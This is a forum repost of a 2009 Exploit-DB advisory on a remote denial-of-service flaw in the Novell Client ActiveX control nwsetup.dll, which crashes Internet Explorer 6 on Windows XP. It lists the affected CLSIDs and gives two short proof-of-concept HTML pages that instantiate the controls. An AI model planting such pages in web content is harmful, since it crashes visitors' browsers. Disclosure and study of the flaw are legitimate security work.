Exploit Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9516
Проверка EDB
  1. Пройдено
Автор
FRANCIS PROVENCHER
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-08-25
Код:
#####################################################################################

Application:  Novell Client for Windows 2000 and XP
            
Platforms:    Windows XP Professional French SP2

crash:	      IE 6.0.2900.2180
	
Exploitation: remote DoS

Date:         2009-08-24

Author:       Francis Provencher (Protek Research Lab's)
             

#####################################################################################

1) Introduction
2) Technical details
3) The Code

#####################################################################################

===============
1) Introduction
===============

The Novell Client workstation software extends the capabilities of Linux and Windows desktops by providing access to NetWare and Open Enterprise Server (OES). Once installed on workstations, Novell Clients enable users to enjoy the full range of Novell services such as authentication via Novell eDirectory, network browsing and service resolution, and secure and reliable file system access—all delivered through industry-standard protocols. The Client supports Novell's traditional NCP protocol.

#####################################################################################

============================
2) Technical details 
============================

Name:	nwsetup.dll
Ver.:	4.91.5.1
CLSID:	{158CD9E8-E195-4E82-9A78-0CF6B86B3629}
CLSID:  {3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}



#####################################################################################

===========
3) The Code
===========

Proof of concept DoS code;


<html><body>
<object classid="CLSID:{3D321EAD-C7B1-41E8-82DD-0855E1E1B0AA}" ></object>
</body></html>

or 


<html><body>
<object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object>
</body></html>

#####################################################################################

# milw0rm.com [2009-08-25]
 
Источник
www.exploit-db.com

Похожие темы